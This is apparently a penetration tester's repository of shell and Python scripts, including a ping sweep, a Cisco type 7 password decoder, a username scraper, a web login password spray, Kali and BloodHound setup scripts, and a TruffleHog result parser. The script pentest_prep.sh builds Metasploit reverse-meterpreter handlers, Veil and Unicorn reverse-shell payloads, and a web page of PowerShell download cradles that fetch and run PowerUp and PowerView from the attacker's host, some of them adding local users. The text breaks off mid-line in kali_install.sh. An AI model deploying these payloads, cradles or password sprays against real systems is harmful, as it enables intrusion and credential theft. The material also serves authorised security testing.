├── diff.py ├── slash16.sh ├── type7.py ├── Username_Web_Scraper ├── k8s └── can-they │ ├── LICENSE │ └── can-they.sh ├── Web_Login_Brute ├── Roll For Initiative ├── README.txt ├── boost.py └── RFI.py ├── truffleparse.py ├── IPSift.py ├── setup.sh ├── pentest_prep.sh ├── kali_install.sh ├── kickoff.sh ├── multi_arachni.py └── PowerShellWMIEvents.ps1 /diff.py: -------------------------------------------------------------------------------- 1 | #Prints out unique lines between two files. 2 | file1 = open("file2.txt", "r") 3 | file2 = open("file1.txt", "r") 4 | list1 = file1.readlines() 5 | list2 = file2.readlines() 6 | print "Unique in file2" 7 | for i in list2: 8 | if i not in list1: 9 | print i 10 | 11 | print "Unique in file1" 12 | for i in list1: 13 | if i not in list2: 14 | print i 15 | -------------------------------------------------------------------------------- /slash16.sh: -------------------------------------------------------------------------------- 1 | #If a consistent gateway IP is used, this will help sift through a /16 2 | #so that you aren't feeding your scanner a bunch of non existent /24s.inc=1 3 | #Used '/root/slash16.sh |grep -B 1 "2 received"' to run and grep out valid subnets. 4 | 5 | for a in $(seq 1 254) 6 | do 7 | if [[ $inc -lt 6 ]] #Currently set to scan 5 systems at the same time. "Multiprocessing" if you will. 8 | then 9 | ping -c 2 x.x.$a.x & #gatway IP on each subnet. 
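Sequencing through the 3rd octet
    ((inc++))
  else
    wait
    inc=1
  fi
done
--------------------------------------------------------------------------------
/type7.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
"""Decode a Cisco IOS "type 7" (service password-encryption) string.

Usage: python type7.py <type7-string>

Type 7 is reversible obfuscation, not encryption: the first two characters are
a decimal seed into a fixed key and every following pair of hex digits is one
password byte XORed with successive key characters.  Any password recovered
this way should be treated as compromised; configs should use `enable secret`
(type 5/8/9 hashes) instead.
"""
import sys

# The full 53-character type 7 key.  The original script embedded only a
# 21-character window of it (and a typo in its first character), so seeds 0/1
# decoded wrongly and anything longer than the window raised IndexError.  The
# key index wraps modulo its length.
TYPE7_KEY = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encrypted_pass):
    """Return the plaintext for a type 7 string.

    encrypted_pass: two decimal seed digits followed by an even number of hex digits.
    Raises ValueError on a malformed string instead of an IndexError/ValueError
    from deep inside the loop.
    """
    if len(encrypted_pass) < 2 or len(encrypted_pass) % 2:
        raise ValueError("type 7 strings are an even number of characters, at least 2")
    try:
        seed = int(encrypted_pass[:2], 10)
    except ValueError:
        raise ValueError("the first two characters must be a decimal seed")
    hex_body = encrypted_pass[2:]
    plaintext_pass = []
    for idx in range(0, len(hex_body), 2):
        try:
            decimal_value = int(hex_body[idx:idx + 2], 16)
        except ValueError:
            raise ValueError("non-hex byte at offset %d" % (idx + 2))
        # Key position is seed + byte index, wrapping around the key.
        key_char = TYPE7_KEY[(seed + idx // 2) % len(TYPE7_KEY)]
        plaintext_pass.append(chr(ord(key_char) ^ decimal_value))
    return ''.join(plaintext_pass)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.stderr.write("usage: %s <type7-string>\n" % sys.argv[0])
        sys.exit(2)
    try:
        print('The plaintext password is: ' + decode_type7(sys.argv[1]))
    except ValueError as exc:
        sys.stderr.write("error: %s\n" % exc)
        sys.exit(1)
--------------------------------------------------------------------------------
/Username_Web_Scraper:
--------------------------------------------------------------------------------
echo "*************************************************************"
echo "Username Scraper by @sw@mp_f0x"
echo "*************************************************************"

echo "">page_id.txt

for i in $(cat names.txt)
do echo "Trying $i..."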
9 | curl -s --data "name=$i&search_other_name=title" http://www.client.com/index.php |awk '/view\=/&&gsub(/.*view\=|'\''\>[A-Z].*/,"")'>> page_id.txt 10 | done 11 | 12 | for j in $(sort -u page_id.txt) 13 | do username=$(curl -s "http://www.client.com/index.php?view=$j"|awk '/Username\:/&&gsub(/.*Username:<\/td>|<\/td.*/,"")'|tee -a usernames.txt) 14 | echo "Username Found: $username" 15 | done 16 | -------------------------------------------------------------------------------- /k8s/can-they/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 sart-bf 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
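--------------------------------------------------------------------------------
/Web_Login_Brute:
--------------------------------------------------------------------------------
#!/bin/bash
# Web login brute forcer: tries ONE password against every account in
# usernames.txt (a password spray).  Use only against systems you are
# authorised to test, and check the target's lockout policy before running it
# more than once with different passwords.
#
# brute-forcer.log ends up holding recovered credentials in clear text; keep it
# owner-readable and remove it once the engagement is reported.
umask 077

echo "*************************************************************"|tee -a brute-forcer.log
echo "Web Login Brute Forcing Tool by @sw@mp_f0x"|tee -a brute-forcer.log
echo "*************************************************************"|tee -a brute-forcer.log

#settings
password=Password1
count=0
form_URL=https://www.client.com/displaylogin
login_URL=https://www.client.com/login
# Share one cookie jar between the token GET and the login POST: the form
# token is presumably tied to the session that fetched it (confirm against the
# application), and without cookies the two requests are unrelated.
cookie_jar=$(mktemp)
trap 'rm -f "$cookie_jar"' EXIT

echo "Beginning brute force against $form_URL"|tee -a brute-forcer.log
echo ""|tee -a brute-forcer.log
while IFS= read -r name; do
  [ -z "$name" ] && continue
  ((count++))
  form_token=$(curl -s -c "$cookie_jar" "$form_URL"|awk -F"\"" '/login.form.token/{print $2}')
  # The original posted to $submission_URL, which is never defined, so curl got
  # an empty URL, $result stayed empty and every account was logged as a hit.
  result=$(curl -s -b "$cookie_jar" --data-urlencode "pass=$password" --data-urlencode "user=$name" --data-urlencode "uid=$form_token" "$login_URL")
  curl_status=$?
  if [ "$curl_status" -ne 0 ] || [ -z "$result" ]
  then
    # No response is a transport failure, not a successful login.
    echo "[?]$count. $name Inconclusive (curl exit $curl_status, empty response)."|tee -a brute-forcer.log
  elif ! grep -q "Error:" <<<"$result"
  then
    echo "[+]$count. Success! $name:$password"|tee -a brute-forcer.log
  else
    echo "[-]$count. $name Failed." |tee -a brute-forcer.log
  fi
done < usernames.txt

echo "Finished."|tee -a brute-forcer.log
echo ""|tee -a brute-forcer.log
echo "=============================================================="|tee -a brute-forcer.log
echo ""|tee -a brute-forcer.log
echo "The following credentials were found:"|tee -a brute-forcer.log
echo ""|tee -a brute-forcer.log
grep 'Success' brute-forcer.log
--------------------------------------------------------------------------------
/Roll For Initiative/README.txt:
--------------------------------------------------------------------------------
Roll For Initiative is a tool for kicking off your security assessment.

Setup:
1. Place both scripts in the same location
2. Run RFI.py
3. You will be presented with a menu to select from.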
Below is a description of the menu items.

Usage:
When running, RFI is going to ask for a client name. This name will be used to create a client folder at '/root/Clients/[client name]'. Next, RFI is going to look for 'scope.txt' and 'excludes.txt' files in that client folder, with 'scope.txt' containing the ranges you want to scan and 'excludes.txt' containing anything that should not be scanned. The 'excludes.txt' file must exist, even if it is empty. Lastly, RFI will want you to confirm the log file to be used. Hit enter for the default. In this log file you will find timestamps for each scan done within RFI.

Menu:
1. Kickoff scan - This is going to do a number of scans and parse some of those scans into useful files.
 a) Ping-sweep. Uses 'scope.txt' and 'excludes.txt' to build a live host list that is parsed into 'live-hosts.txt'. RFI will pause after the ping sweep so you can check your live host list and confirm that the excluded hosts were actually left out before any service scans run. Hit enter when finished.
 b) Targeted port scans. The following ports are scanned for version information, and Nmap, Gnmap, and XML output files are created for each: 22, 23, 53, 389, 686, 2049, 5800, 5900-5920, 5985, 10000. The following ports are scanned for version info and applicable NSE scripts are used: 445, 21, 25, 1433, 3306, 80.
 c) A list of non-printer hosts with telnet open is parsed into '/root/Clients/[client name]/Finals/TelnetList.txt' (kickoff.sh writes this file as 'TelnetList.gnmap').
 d) A list of hosts with port 445 open is parsed into 445.txt.
 e) Hosts with port 25 open are scanned for SMTP enumeration and open relay. Results are exported to '/root/Clients/[client name]/Finals/'.
2. Rawr Scan - Nmap is used to scan each host for the following ports: 80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,7000,7001,7002,8000,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8443,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092. The resultant XML file is fed into Rawr.
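A folder starting with 'log' will be dropped in the client folder with the Rawr results.
3. Service Scan - Scans for the top 1000 ports with Nmap. Exports Nmap, Gnmap, and XML.
4. Pentest Setup - Takes an IP address that it uses for LHOST. Creates TCP and HTTPS Veil and Unicorn payloads and drops them at '/root/' and '/var/www/html'. A Metasploit resource script named 'bounce' is placed in the root directory. When run it will set up handlers for the TCP and HTTPS payloads. An html file is placed at '/var/www/html/cmd.html' that includes Powershell cmdlet download cradles with the supplied IP address.
--------------------------------------------------------------------------------
/truffleparse.py:
--------------------------------------------------------------------------------
import json
import os
import sqlite3

##### truffleparse.py #####
# Parses a folder of Trufflehog JSON output files (one finding per line) into
# a SQLite database for analysis.
#
# The `raw` column stores the verbatim secret material TruffleHog matched, so
# the database is itself sensitive: it is chmod 600 below, findings are no
# longer echoed to the terminal, and the file should be deleted (and the
# secrets rotated) once triage is done.

# Set the path to your SQLite3 database file
database_path = "truffle.sqlite3"
# Set the directory containing Trufflehog JSON output files
directory_path = "./"

###########################

### Reference Queries ###
# SELECT DISTINCT detectorname FROM truffle;
# SELECT DISTINCT raw FROM truffle ORDER BY raw ASC;
# SELECT raw FROM truffle where raw like '%test.org%';
# SELECT DISTINCT raw,repo,file FROM truffle WHERE detectorname = 'AWS';
# SELECT raw, GROUP_CONCAT(repo) as repos FROM truffle GROUP BY raw;

CREATE_TABLE_SQL = '''CREATE TABLE IF NOT EXISTS truffle
(
    repo TEXT,
    branch TEXT,
    file TEXT,
    line int,
    raw TEXT,
    detectorname TEXT,
    extradata TEXT
)
'''

INSERT_SQL = "INSERT INTO truffle (repo, branch, file, line, raw, detectorname, extradata) VALUES (?, ?, ?, ?, ?, ?, ?)"


def _git_field(result, key):
    """Return SourceMetadata.Data.Git[key] from a finding, or None if absent.

    The original indexed ["SourceMetadata"]["Data"]["Git"] unconditionally and
    died with KeyError on any finding that did not come from a git source.
    """
    git = result.get("SourceMetadata", {}).get("Data", {}).get("Git")
    if not isinstance(git, dict):
        return None
    return git.get(key)


def finding_to_row(result):
    """Map one parsed TruffleHog finding (dict) to the tuple inserted into `truffle`.

    Column order: repo, branch, file, line, raw, detectorname, extradata.
    NOTE: the `branch` column actually holds the commit hash; the schema is
    kept as-is so the reference queries above keep working.
    """
    return (
        _git_field(result, "repository"),
        _git_field(result, "commit"),
        _git_field(result, "file"),
        _git_field(result, "line"),
        result.get("Raw"),
        result.get("DetectorName"),
        str(result.get("ExtraData")),
    )


def ingest_file(cursor, file_path):
    """Insert every JSON line of file_path through `cursor`; return the number inserted.

    Blank lines are skipped (json.loads("") raises) and an unparseable line is
    reported and skipped rather than aborting the whole import.  The finding
    itself is deliberately not printed: it contains the secret.
    """
    inserted = 0
    with open(file_path, "r") as f:
        for lineno, finding in enumerate(f, 1):
            finding = finding.strip()
            if not finding:
                continue
            try:
                result = json.loads(finding)
            except ValueError as exc:
                print(f"Skipping {file_path}:{lineno}: not valid JSON ({exc})")
                continue
            cursor.execute(INSERT_SQL, finding_to_row(result))
            inserted += 1
    return inserted


def main():
    """Create the table if needed and ingest every *.json file in directory_path."""
    # Connect to the SQLite3 database
    conn = sqlite3.connect(database_path)
    try:
        # Restrict the (plaintext-secret-bearing) database to the owner.
        os.chmod(database_path, 0o600)
        c = conn.cursor()
        # Create the table to hold the Trufflehog results
        c.execute(CREATE_TABLE_SQL)

        for filename in sorted(os.listdir(directory_path)):
            if not filename.endswith(".json"):
                continue
            file_path = os.path.join(directory_path, filename)
            if not os.path.isfile(file_path):
                # Handle directories or other non-file objects
                print(f"Found directory: {file_path}")
                continue
            print(f"Found file: {file_path}")
            count = ingest_file(c, file_path)
            # Commit per file so a bad file later on does not lose earlier work.
            conn.commit()
            print(f"  {count} findings ingested")
    finally:
        conn.close()

    print("Trufflehog results ingested into the database successfully.")


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
/IPSift.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Created by @sw4mp_f0x
# https://github.com/Sw4mpf0x/
#
# Parse a list of line delimited IP addresses or gnmap file
# for false positive /24 subnets based on the number of live hosts found
# For example, the following will output all addresses in /24 subnets
# where less that 250 hosts were found:
#
# python IPSift.py -g scan.gnmap -o output.txt -c 250
#
# The assumption here is that /24 ranges with more than 250 hosts showing as live
# are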
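# false positives.
#
#
#

import itertools
import re
from os.path import isfile
from optparse import OptionParser

# Set in main(); the parse helpers use it to report fatal argument errors.
parser = None


def gnmap_parse(path):
    """Return the addresses of 'Up' hosts from a gnmap file, each newline-terminated.

    Exits via parser.error when path is not a file.
    """
    if not isfile(path):
        parser.error("The gnmap file does not exists at the provided path")
    addresses = []
    print("Gnmap file found, parsing...")
    with open(path) as handle:
        for line in handle:
            if "Up" in line:
                addresses.append('%s\n' % (line.split()[1]))
    return addresses


def txt_parse(path):
    """Return every non-blank line of a text file of addresses, each newline-terminated.

    Blank lines are dropped (the numeric sort in main() cannot handle them) and a
    final line without a newline is normalised, so the output file stays one
    address per line.  Exits via parser.error when path is not a file.
    """
    if not isfile(path):
        parser.error("The txt file does not exists at the provided path")
    addresses = []
    print("Txt file found, parsing...")
    with open(path) as handle:
        for address in handle:
            address = address.strip()
            if address:
                addresses.append(address + '\n')
    return addresses


def create_output_file(path, validaddresses, count):
    """Write every entry of every range in validaddresses to path and print a summary.

    validaddresses: list of lists of newline-terminated strings.
    count: the threshold as given on the command line; only echoed in the summary.
    """
    final_address_count = 0
    with open(path, "w") as finaloutput:
        for address_range in validaddresses:
            for address in address_range:
                finaloutput.write(address)
                final_address_count += 1
    print("")
    print("Valid ranges and addresses found to have less than " + str(count) + " live hosts:")
    print("Valid ranges: " + str(len(validaddresses)))
    print("Valid addresses: " + str(final_address_count))
    print("Output file " + path + " created")
    print("")


def group_by_slash24(addresses, count):
    """Split sorted, newline-terminated dotted-quad addresses into (valid, falsepositives).

    Consecutive addresses sharing their first three octets form one /24.  A /24
    with fewer than count live hosts is kept: its address list is appended to
    valid.  Otherwise the range is recorded in falsepositives as a one-element
    list ["a.b.c.0/24\\n"], ready for create_output_file.

    Fixes relative to the original loop: the last /24 in the input is no longer
    dropped (it was only flushed when a *following* address changed prefix), the
    false-positive entry carried no newline, and the literal was unterminated.
    """
    count = int(count)
    valid = []
    falsepositives = []

    def prefix_of(address):
        return ".".join(address.strip().split(".")[0:3])

    # Input is numerically sorted by main(), so groupby yields each /24 once.
    for workingaddress, members in itertools.groupby(addresses, key=prefix_of):
        validrange = list(members)
        if len(validrange) < count:
            print("Valid address range " + workingaddress + ".0/24 found")
            valid.append(validrange)
        else:
            falsepositives.append([workingaddress + ".0/24\n"])
    return valid, falsepositives


def main():
    """Parse arguments, load the address list, and write the output file(s)."""
    # Argument parsing
    usage = "usage: %prog --gnmap gnmap_file_path --output output_file_path"
    global parser
    parser = OptionParser(usage=usage)
    parser.add_option('-g', '--gnmap', action="store", help='GNmap file to parse', dest='gnmap_path')
    parser.add_option('-o', '--output', action="store", help='Output file name', dest='output_path')
    parser.add_option('-f', '--falsepos', action="store", help='False Positive Output file name', dest='false_output_path')
    parser.add_option('-t', '--txt', action="store", help="Txt file to parse", dest='txt_path')
    parser.add_option('-c', '--count', action="store", help="Marked /24 as false positive if number of hosts in /24 is >= this number", dest='count', default='255')

    (options, args) = parser.parse_args()

    # Checking for required arguments: an input file of either kind, plus an output name.
    if (not options.gnmap_path and not options.txt_path) or not options.output_path:
        parser.error("A file to parse (gnmap or txt) and output file name must be specified")

    try:
        count = int(options.count)
    except ValueError:
        parser.error("--count must be an integer")

    if options.gnmap_path:
        addresses = gnmap_parse(options.gnmap_path)
    else:
        addresses = txt_parse(options.txt_path)

    # Numeric sort (not lexical) so 10.0.0.9 precedes 10.0.0.10 and every /24 is contiguous.
    addresses.sort(key=lambda ip: [int(octet) for octet in ip.split('.')])
    print(str(len(addresses)) + " addresses found")
    print("Processing addresses...")
    validaddresses, falsepositives = group_by_slash24(addresses, count)

    create_output_file(options.output_path, validaddresses, options.count)
    if options.false_output_path:
        create_output_file(options.false_output_path, falsepositives, options.count)


if __name__ == "__main__":
    main()
--------------------------------------------------------------------------------
/setup.sh:
--------------------------------------------------------------------------------
apt-get update
#cwd=$(pwd)
touch /var/www/ghostdriver.log
chmod 755 /var/www/ghostdriver.log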
5 | chown www-data /var/www/ghostdriver.log 6 | 7 | #Setup Postgresql 8 | service postgresql start 9 | su postgres << 'EOF' 10 | createdb BloodHound_db 11 | psql -c "CREATE USER bloodhound WITH PASSWORD 'bloodhound' CREATEDB;" 12 | psql -c 'GRANT ALL PRIVILEGES ON DATABASE "BloodHound_db" TO bloodhound;' 13 | EOF 14 | 15 | mv BloodHound/ /opt/ 16 | #Install PhantomJS 17 | apt-get -y install python-requests python-m2crypto build-essential chrpath libssl-dev libxft-dev libfreetype6 libfreetype6-dev libfontconfig1 libfontconfig1-dev 18 | 19 | 20 | cd ~ 21 | MACHINE_TYPE=`uname -m` 22 | if [ ${MACHINE_TYPE} == 'x86_64' ]; then 23 | PHANTOM_JS="phantomjs-1.9.8-linux-x86_64" 24 | export PHANTOM_JS="phantomjs-1.9.8-linux-x86_64" 25 | else 26 | PHANTOM_JS="phantomjs-1.9.8-linux-i686" 27 | export PHANTOM_JS="phantomjs-1.9.8-linux-i686" 28 | fi 29 | 30 | wget https://bitbucket.org/ariya/phantomjs/downloads/$PHANTOM_JS.tar.bz2 31 | tar xvjf $PHANTOM_JS.tar.bz2 32 | 33 | mv $PHANTOM_JS /usr/local/share 34 | ln -sf /usr/local/share/$PHANTOM_JS/bin/phantomjs /usr/local/bin 35 | rm $PHANTOM_JS.tar.bz2 36 | 37 | #Make BloodHound Directory 38 | #start postgresql service at boot 39 | #http://thecodeship.com/deployment/deploy-django-apache-virtualenv-and-mod_wsgi/ 40 | #https://www.digitalocean.com/community/tutorials/how-to-serve-django-applications-with-apache-and-mod_wsgi-on-ubuntu-14-04 41 | #Install Python Virtual Environment 42 | apt-get -y install python-pip python-dev build-essential libpq-dev swig 43 | pip install --upgrade pip 44 | pip install Django 45 | pip install virtualenvwrapper 46 | pip install selenium 47 | echo "export WORKON_HOME=$HOME/.virtualenvs" >> ~/.bash_profile 48 | echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bash_profile 49 | source ~/.bash_profile 50 | cd /opt/BloodHound 51 | mkvirtualenv BloodHound --no-site-packages 52 | workon BloodHound 53 | pip install psycopg2 54 | pip install M2Crypto 55 | #Install Django 56 | pip install selenium 57 | 
pip install Django 58 | pip install Pillow==2.6.1 requests 59 | ./manage.py migrate 60 | ./manage.py makemigrations 61 | ./manage.py migrate 62 | chmod 777 /opt/BloodHound/Web_Scout/static/Web_Scout/ 63 | #Setup Python Virtual Environment 64 | #echo "export WORKON_HOME=$HOME/.virtualenvs" >> ~/.bash_profile 65 | #echo "source /usr/local/bin/virtualenvwrapper.sh" >> ~/.bash_profile 66 | #source ~/.bash_profile 67 | #cd /opt/BloodHound 68 | #mkvirtualenv BloodHound --no-site-packages 69 | #pip freeze > requirements.txt 70 | #workon BloodHound 71 | #for i in $(cat requirements.txt);do pip install $i;done 72 | #pip install psycopg2 73 | 74 | deactivate 75 | #rm requirements.txt 76 | 77 | 78 | 79 | #Setup Apache 80 | apt-get -y install apache2 libapache2-mod-wsgi 81 | 82 | echo "" >> /etc/apache2/sites-available/000-default.conf 83 | echo "" >> /etc/apache2/sites-available/000-default.conf 84 | echo " Alias /static /opt/BloodHound/Web_Scout/static/" >> /etc/apache2/sites-available/000-default.conf 85 | echo " " >> /etc/apache2/sites-available/000-default.conf 86 | echo " Require all granted" >> /etc/apache2/sites-available/000-default.conf 87 | echo " " >> /etc/apache2/sites-available/000-default.conf 88 | echo "" >> /etc/apache2/sites-available/000-default.conf 89 | echo " " >> /etc/apache2/sites-available/000-default.conf 90 | echo " " >> /etc/apache2/sites-available/000-default.conf 91 | echo " Require all granted" >> /etc/apache2/sites-available/000-default.conf 92 | echo " " >> /etc/apache2/sites-available/000-default.conf 93 | echo " " >> /etc/apache2/sites-available/000-default.conf 94 | echo " WSGIDaemonProcess BloodHound python-path=/opt/BloodHound:/root/.virtualenvs/BloodHound/lib/python2.7/site-packages" >> /etc/apache2/sites-available/000-default.conf 95 | echo " WSGIProcessGroup BloodHound" >> /etc/apache2/sites-available/000-default.conf 96 | echo " WSGIScriptAlias / /opt/BloodHound/BloodHound/wsgi.py" >> /etc/apache2/sites-available/000-default.conf 97 | 
echo "" >> /etc/apache2/sites-available/000-default.conf 98 | echo "" >> /etc/apache2/sites-available/000-default.conf 99 | echo "listen 8000" >> /etc/apache2/ports.conf 100 | service apache2 restart -------------------------------------------------------------------------------- /pentest_prep.sh: -------------------------------------------------------------------------------- 1 | #/bin/bash 2 | #Usage 3 | display_usage(){ 4 | clear 5 | echo "============================================================" 6 | echo "This script requires a LHOST IP address." 7 | echo "" 8 | echo "Usage: $0 10.10.10.10" 9 | echo "============================================================" 10 | echo "" 11 | } 12 | 13 | if [ $# -le 0 ] 14 | then 15 | display_usage 16 | exit 0 17 | fi 18 | 19 | #MSF resource file 20 | 21 | echo "use exploit/multi/handler" > /bounce 22 | echo "jobs -K" >> /bounce 23 | echo "set payload windows/meterpreter/reverse_tcp" >> /bounce 24 | echo "set exitonsession false" >> /bounce 25 | echo "set lport 53" >> /bounce 26 | echo "set enablestageencoding true" >> /bounce 27 | echo "set autorunscript migrate -f" >> /bounce 28 | echo "set LHOST $1" >> /bounce 29 | echo "exploit -j -z" >> /bounce 30 | 31 | echo "set payload windows/meterpreter/reverse_https" >> /bounce 32 | echo "set lport 443" >> /bounce 33 | echo "exploit -j -z" >> /bounce 34 | 35 | #Setup /var/www/cmd.html page 36 | 37 | echo "Invoke-AllChecks

" > /var/www/cmd.html 38 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-Allchecks\"" >> /var/www/cmd.html 39 | echo "

" >> /var/www/cmd.html 40 | echo "Write-UserAddServiceBinary

" >> /var/www/cmd.html 41 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Write-UserAddServiceBinary -ServiceName SQLRODBC\"" >> /var/www/cmd.html 42 | echo "

" >> /var/www/cmd.html 43 | echo "Invoke-ServiceUserAdd

" >> /var/www/cmd.html 44 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/PowerUp.ps1'); Invoke-ServiceUserAdd -ServiceName spooler\"" >> /var/www/cmd.html 45 | echo "

" >> /var/www/cmd.html 46 | echo "Invoke-FindLocalAdminAccess

" >> /var/www/cmd.html 47 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-FindLocalAdminAccess\"" >> /var/www/cmd.html 48 | echo "

" >> /var/www/cmd.html 49 | echo "Invoke-userhunter

" >> /var/www/cmd.html 50 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-userhunter\"" >> /var/www/cmd.html 51 | echo "

" >> /var/www/cmd.html 52 | echo "Invoke-ShareFinder

" >> /var/www/cmd.html 53 | echo "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://$1:8080/powerview.ps1'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt\"" >> /var/www/cmd.html 54 | 55 | #Setup Veil payloads 56 | rm /root/HTTPS_443.exe 57 | rm /root/TCP_53.exe 58 | rm /root/power443.txt 59 | rm /root/power53.txt 60 | rm /var/www/HTTPS_443.exe 61 | rm /var/www/TCP_53.exe 62 | rm /var/www/power443.txt 63 | rm /var/www/power53.txt 64 | 65 | rm /usr/share/veil-evasion/compiled/HTTPS_443.exe 66 | rm /usr/share/veil-evasion/handlers/HTTPS_443_handler.rc 67 | rm /usr/share/veil-evasion/source/HTTPS_443.rb 68 | /root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_https -c LPORT=443 LHOST=$1 -o HTTPS_443 69 | cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /root/HTTPS_443.exe 70 | cp /usr/share/veil-evasion/compiled/HTTPS_443.exe /var/www/HTTPS_443.exe 71 | 72 | rm /usr/share/veil-evasion/compiled/TCP_53.exe 73 | rm /usr/share/veil-evasion/handlers/TCP_53_handler.rc 74 | rm /usr/share/veil-evasion/source/TCP_53.rb 75 | /root/tools/Veil-Evasion/Veil-Evasion.py -p ruby/meterpreter/rev_tcp -c LPORT=53 LHOST=$1 -o TCP_53 76 | cp /usr/share/veil-evasion/compiled/TCP_53.exe /root/TCP_53.exe 77 | cp /usr/share/veil-evasion/compiled/TCP_53.exe /var/www/TCP_53.exe 78 | 79 | #Setup Unicorn payload 80 | python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_https $1 443 81 | cp /root/tools/powershell_attack.txt /root/power443.txt 82 | cp /root/tools/powershell_attack.txt /var/www/power443.txt 83 | echo "

" >> /var/www/cmd.html 84 | echo "Powershell HTTPS Payload

" >> /var/www/cmd.html 85 | cat /root/power443.txt >> /var/www/cmd.html 86 | 87 | python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_tcp $1 53 88 | cp /root/tools/powershell_attack.txt /root/power53.txt 89 | cp /root/tools/powershell_attack.txt /var/www/power53.txt 90 | echo "

" >> /var/www/cmd.html 91 | echo "Powershell TCP Payload

" >> /var/www/cmd.html 92 | cat /root/power53.txt >> /var/www/cmd.html 93 | -------------------------------------------------------------------------------- /kali_install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y 3 | 4 | rm /var/www/index.html 5 | mkdir /root/tools 6 | mkdir /var/www/rawr 7 | 8 | #basic installs 9 | apt-get install rdate 10 | apt-get install python-setuptools 11 | easy_install pip 12 | pip install selenium 13 | apt-get install unrar unace rar unrar p7zip zip unzip p7zip-full p7zip-rar file-roller -y 14 | 15 | #Big gitlist 16 | # 17 | #mkdir /opt/gitlist/ 18 | #cd /opt/gitlist 19 | #git clone https://github.com/macubergeek/gitlist.git 20 | #cd gitlist 21 | #chmod +x gitlist.sh 22 | #./gitlist.sh 23 | 24 | #msfconsole.rc 25 | # 26 | echo "spool /mylog.log" >> /msfconsole.rc 27 | echo "set consolelogging true" >> /msfconsole.rc 28 | echo "set loglevel 5" >> /msfconsole.rc 29 | echo "set sessionlogging true" >> /msfconsole.rc 30 | echo "set timestampoutput true" >> /msfconsole.rc 31 | echo 'setg prompt "%cya%T%grn S:%S%blu J:%J "' >> /msfconsole.rc 32 | 33 | #sipvicious 34 | 35 | cd /root/tools 36 | git clone https://github.com/sandrogauci/sipvicious.git 37 | 38 | #Empire 39 | 40 | cd /root/tools 41 | git clone https://github.com/PowerShellEmpire/Empire.git 42 | #run setup manually. 
43 | 44 | #Snarf 45 | 46 | cd /root/tools 47 | git clone https://github.com/purpleteam/snarf.git 48 | 49 | #Veil-Evasion setup 50 | # 51 | 52 | pip install symmetricjsonrpc #needed for Kali 2.0 53 | cd /root/tools 54 | git clone https://github.com/Veil-Framework/Veil-Evasion.git 55 | cd /root/tools/Veil-Evasion/setup 56 | ./setup.sh 57 | cd /root/tools/Veil-Evasion/Veil-Catapult 58 | ./setup.sh 59 | 60 | #Responder Setup 61 | rm -r /usr/share/responder 62 | rm /usr/bin/responder 63 | cd /root/tools 64 | git clone https://github.com/SpiderLabs/Responder.git 65 | cd Responder 66 | cp -r * /usr/bin 67 | 68 | #Impacket Setup 69 | cd /root/tools 70 | git clone https://github.com/CoreSecurity/impacket.git 71 | cd impacket 72 | python setup.py install 73 | cp /root/tools/impacket/examples/smbrelayx.py /usr/bin 74 | chmod 755 /usr/bin/smbrelayx.py 75 | cp /root/tools/impacket/examples/goldenPac.py /usr/bin 76 | chmod 755 /usr/bin/goldenPac.py 77 | 78 | #CG's gold_digger script {http://carnal0wnage.attackresearch.com/2015/02/my-golddigger-script.html} 79 | # 80 | mkdir -p /opt/carnal0wnage 81 | cd /opt/carnal0wnage 82 | git clone https://github.com/carnal0wnage/Metasploit-Code.git 83 | cp /opt/carnal0wnage/Metasploit-Code/modules/post/windows/gather/gold_digger.rb /usr/share/metasploit-framework/modules/post/windows/gather 84 | 85 | #Shell_Shocker Setup 86 | cd /root/tools 87 | git clone https://github.com/mubix/shellshocker-pocs.git 88 | 89 | #RAWR Setup 90 | cd /root/tools 91 | git clone https://bitbucket.org/al14s/rawr.git 92 | cd /root/tools/rawr 93 | ./install.sh 94 | 95 | #PowerSploit Setup 96 | cd 